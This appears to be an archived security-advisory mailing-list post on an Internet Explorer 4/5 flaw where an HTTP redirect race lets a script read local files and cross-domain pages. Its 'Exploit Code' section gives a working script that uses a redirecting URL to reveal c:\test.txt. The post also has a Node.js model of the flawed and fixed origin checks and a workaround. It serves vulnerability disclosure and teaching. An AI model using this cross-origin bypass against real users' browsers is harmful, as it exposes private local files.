IE HTTP redirection problem
----------------------------------------------------------------------------
SUMMARY
Internet Explorer 4.0 and 5.0 under Windows 95 and NT 4.0 allow a script on one
web page to read local text and HTML files and files from any other domain
(reading files of other types is probably possible as well). Window spoofing
is possible, and in some cases files behind a firewall can be read as well.
The vulnerability may be exploited from an HTML email message or a newsgroup
posting.
DETAILS
The problem behaves like a race condition immediately after
window.open("HTTP-redirecting-URL").
If you do:
a=window.open("HTTP-redirecting-url");
b=a.document;
then "b" gives you access to the document of the URL the redirect lands on,
even though that document comes from another domain (or from the local file
system), which the cross-domain security checks are supposed to forbid.
Exploit Code
<SCRIPT>
// Ask the user to create the local file that the demonstration will read.
alert("Create short text file c:\\test.txt and it will be read and shown in a message box");
// Open a URL on the attacker's site that answers with an HTTP redirect to file://c:/test.txt.
a=window.open("http://www.nat.bg/~joro/reject.cgi?test.txt");
// Take the document reference immediately, before the redirect has been followed.
b=a.document;
// Once the redirected page has loaded, the stale reference still exposes its contents.
setTimeout("alert(b.body.innerText);",4000);
</SCRIPT>
// "http://www.nat.bg/~joro/reject.cgi?test.txt" just does an HTTP redirect
to: "file://c:/test.txt"
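The following is an added example, not code from the advisory or from Georgi Guninski: a small Node.js model of the origin check that the timing trick above defeats. The redirect table REDIRECTS is a constructed stand-in for reject.cgi, DOCUMENTS holds constructed page contents, and OPENER is an assumed URL for the attacking page. The flawed variant decides on access using the URL handed to window.open (before the HTTP redirect is followed), which is what the exploit relies on; the fixed variant decides on the origin of the document that actually loaded.

```javascript
// Added example (not Guninski's code): a model of the check the advisory defeats.
// REDIRECTS stands in for reject.cgi (constructed table: the first URL answers
// with a Location header pointing at the second). DOCUMENTS holds constructed
// page contents keyed by the URL that finally loads.
const REDIRECTS = new Map([
  ["http://www.nat.bg/~joro/reject.cgi?test.txt", "file://c:/test.txt"],
]);
const DOCUMENTS = new Map([
  ["file://c:/test.txt", { body: { innerText: "secret local file" } }],
  ["http://www.nat.bg/~joro/page.html", { body: { innerText: "same-origin page" } }],
]);
// Assumed URL of the attacking page (lives on the same site as reject.cgi).
const OPENER = "http://www.nat.bg/~joro/msredir1.html";

function originOf(url) {
  const u = new URL(url);
  // file: URLs get an opaque origin; no web page may be same-origin with them.
  return u.protocol === "file:" ? "null" : u.origin;
}

// Follow the constructed redirect chain, with a hop limit against loops.
function resolveRedirects(url, maxHops = 10) {
  let current = url;
  for (let hop = 0; hop < maxHops && REDIRECTS.has(current); hop++) {
    current = REDIRECTS.get(current);
  }
  return current;
}

// Flawed model: the origin check is made against the URL handed to window.open,
// i.e. before the HTTP redirect is followed. Opener and target look same-origin,
// so the document reference is released, and it later points at the file:// page.
function openWindowVulnerable(openerUrl, targetUrl) {
  const allowed = originOf(openerUrl) === originOf(targetUrl);
  const finalUrl = resolveRedirects(targetUrl);
  return { location: finalUrl, document: allowed ? DOCUMENTS.get(finalUrl) : null };
}

// Fixed model: the check is made against the origin of the document that actually
// loaded, so a redirect to another domain or to file:// yields no document access.
function openWindowFixed(openerUrl, targetUrl) {
  const finalUrl = resolveRedirects(targetUrl);
  const allowed = originOf(openerUrl) === originOf(finalUrl);
  return { location: finalUrl, document: allowed ? DOCUMENTS.get(finalUrl) : null };
}

// Mirrors the exploit: open the redirecting URL, keep the document handle, read it.
// Returns the leaked text, or null when the browser model withheld the document.
function exploitAttempt(openWindow) {
  const a = openWindow(OPENER, "http://www.nat.bg/~joro/reject.cgi?test.txt");
  const b = a.document;
  return b ? b.body.innerText : null;
}

console.log("vulnerable model:", exploitAttempt(openWindowVulnerable));
console.log("fixed model:", exploitAttempt(openWindowFixed));
```

The model is deliberately synchronous; in the real browser the gap between window.open returning and the redirected page loading is what the 4-second setTimeout in the exploit waits out. The lesson carries over to any cross-origin decision: evaluate it against the resource that finally loaded, never against the URL that was requested, because a server under the attacker's control can change the latter into anything with one Location header.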
Workaround:
Disable Active Scripting.
A demonstration page is available at:
http://www.nat.bg/~joro/msredir1.html
ADDITIONAL INFORMATION
This vulnerability has been reported by: Georgi Guninski <mailto:[EMAIL PROTECTED]>
This mailing list is supported by:
>> http://www.indolinux.com - the Indonesian Linux world
-------------------------------------------------------------------
To unsubscribe, send email to [EMAIL PROTECTED]
To see the list rules, send email to [EMAIL PROTECTED]
The archive is at http://www.mail-archive.com/[email protected]